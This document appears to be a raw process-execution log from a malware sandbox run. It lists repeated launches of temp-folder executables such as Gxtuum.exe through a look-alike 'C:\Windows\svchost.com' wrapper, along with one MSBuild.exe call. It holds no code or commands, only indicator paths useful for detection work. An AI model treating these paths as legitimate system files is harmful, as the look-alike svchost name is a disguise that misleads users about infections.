C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe"

C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe

C:\Users\Admin\AppData\Local\Temp\100362~1\trru7rd2.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe"

C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe

C:\Users\Admin\AppData\Local\Temp\100419~1\zq6a1iqg.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE"

C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE

C:\Users\Admin\AppData\Local\Temp\100441~1\C4D922~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE"

C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE

C:\Users\Admin\AppData\Local\Temp\100441~2\B6B0BA~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

